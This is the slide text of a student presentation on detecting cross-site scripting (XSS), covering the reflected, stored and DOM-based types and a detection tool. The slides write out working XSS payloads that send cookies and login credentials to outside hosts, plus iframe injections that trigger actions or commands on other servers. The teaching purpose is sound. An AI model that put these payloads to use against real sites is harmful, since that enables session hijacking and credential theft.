Cross Side Scripting (XSS) attack

detection for web application http://sourceforge.net/projects/xssalert7/

Author: Arjun Jain (07104701) Department of Computer Science and Information Technology

Jaypee Institute of Information Technology Sector-62 Noida ,Uttar Pradesh

Agenda Overview of XSS attack

Type of XSS attack

Example

Limitation of attack

DOM security overview

XSS alert working model

Demo

What is Cross Side Scripting (XSS)

Cross-site scripting (XSS) is a type of computer security vulnerability typically found

in web applications that enables malicious attackers to inject client side script into

web pages viewed by other.

Types:

1: Reflected XSS

2: Stored XSS

3: DOM based XSS

Ranked #1 in OWASP 2007 top 10

Ranked #2 in OWASP 2010 top 10

7 out of 10 sites have XSS ( Jeremiah Grossman, White Hat website security

statistics report, Oct 2007 )

Reflected XSS It detect all non-persistent XSS issues which occur when a web application blindly

echo parts of the HTTP request in the corresponding HTTP response HTML.

Example :

<?php

$name= request.getParameter(“name”);

echo “Hey”.$name;

?>

$name may contain javascript.

Stored XSS

It refers to all XSS vulnerabilities, where the adversary is able to permanently inject

the malicious script in the vulnerable application storage . The result is every user

that accesses the poisoned web page received the injected script without further

action by the adversary.

DOM-based XSS

It is special variant of the reflected XSS, where logic errors in legitimate JavaScript

and careless usage of the client-side data result in XSS coordination.

Example

Invalidated input with XSS

Invalidated input with XSS

Invalidated input in XSS

Invalidated input in XSS

Invalidated Input and resulted in a Cross-Site Scripting attack and the theft of the administrator’s Cookies.

Types of Information leakage

Client can reveal cookies to 3rd party (session state, order info, etc)

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-

bin/cookie.cgi?'%20+document.cookie</script >

Client can reveal posted form items to 3rd party (userID/passwd, etc)

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image;

hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value'+':'+

document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to trusted server

www.trustedserver.com/xss.asp?name =

<iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>

Client can be tricked into attacking other sites

/hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>

Limitation of these attacks

Usually only get one transaction with XSS code against vulnerable site

Most attacks are only focused on collecting cookies

POST based forms are seldom leveraged – almost always use GET methods

Attacker does not know actual responses to client

Some experts recommend using POST, hidden form inputs and other session

state info to limit XSS risks.

DOM Security Overview Child windows and same site trust

Scripts can interact between the two windows

Script content can be loaded from anywhere (RPC/Remote scripting is common)

Images can be loaded from anywhere

Javascript can either be within <script></script> tags, loaded elsewhere via

<script src=remote.com>, or attacked to many tags

<img src=javascriptn load=javascript>

Form GET/POST can be to another site or a javascript action

XSS allows DOM abuse, but still follows DOM rules

XSS alert working model

Demo

Attack on Yahoo server with get string

“?q=”

Final Result

Thank You !